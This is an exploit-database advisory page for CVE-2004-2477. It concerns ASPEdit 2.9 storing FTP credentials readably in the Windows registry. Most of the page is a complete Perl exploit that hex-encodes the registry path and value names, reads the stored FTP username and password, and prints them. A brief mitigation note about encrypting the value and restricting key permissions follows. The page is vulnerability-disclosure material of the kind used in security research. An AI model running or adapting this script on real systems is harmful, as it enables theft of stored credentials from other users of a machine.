Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2004-2477 | CWE-200 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Tom Ferris | High | Remote | 2005-10-06 |
Version: ASPEdit 2.9 Operating System: - All Windows Typical software: - Shareware Severity Flaw: - high Description: ASPEdit is a powerfulActive Server Pages and HTML editor with full support for Visual BasicScript, Perl, Cold-fusion, PHP3, MIVA ,HDML, WML and Style sheets Vulnerability: A stored for administration password are captured at the Registry Editor,this could local user/guest to see then retrive the password as they have privillage to open registry editor by search specified vulnerable registry values. Exploit: #!usr/bin/perl # # ASPEdit FTP Password Disclosure Exploit # --------------------------------------- # Infam0us Gr0up - Securiti Research # # Info: infamous.2hell.com # Vendor URL: http://www.tashcom.co.uk/aspedit # use Win32::Registry; print "\nASPEdit FTP Password Disclosure Exploit\n"; print "---------------------------------------\n\n"; print "Registrie: HLKM\\SOFTWARE\\tashcom\\aspedit\\ftp\n"; sleep(1); $usr = "\x66\x74\x70\x5f\x75\x73\x65\x72"; $pas = "\x66\x74\x70\x5f\x70\x61\x73\x73\x77\x6f\x64"; $nutt = "\x53\x4f\x46\x54\x57\x41\x52\x45\x5c\x5c". "\x74\x61\x73\x68\x63\x6f\x6d\x5c\x5c\x61". "\x73\x70\x65\x64\x69\x74\x5c\x5c\x66\x74\x70"; print "[+] Start searching..\n"; print "[+] Finding username .."; my $user; $::HKEY_LOCAL_MACHINE->Open("$nutt", $user) or die "Can't open username value: $^E"; sleep(1); print "[OK]\n"; print "[+] Query value username.."; my ($type, $value); $user->QueryValueEx("$usr", $type, $value) or die "No such user: $^E"; sleep(1); print "[OK]\n"; print "[+] Finding password .."; my $pass; $::HKEY_LOCAL_MACHINE->Open("$nutt", $pass) or die "Can't open password value: $^E"; sleep(1); print "[OK]\n"; print "[+] Query value password.."; my ($type1, $value2); $pass->QueryValueEx("$pas", $type1, $value2) or die "No such password: $^E"; sleep(2); print "[OK]\n"; print "[+] Retrive data registry..\n"; sleep(1); print "[*] User: $value\n"; print "[*] Password: $value2\n"; Solution: On the registry Editor changes the registry path then try to encrypt the password,it more safety. Also set them whit permission(Advanced Security Setting),can be found by rigth click the 'key'value then choose 'permission'. Vendor URL: Mail - [email protected] WWW - http://www.tashcom.com Published: basher13 (Infam0us Gr0up - Securiti Research) [email protected] / infamous.2hell.com
Copyright ©2024 Exploitalert.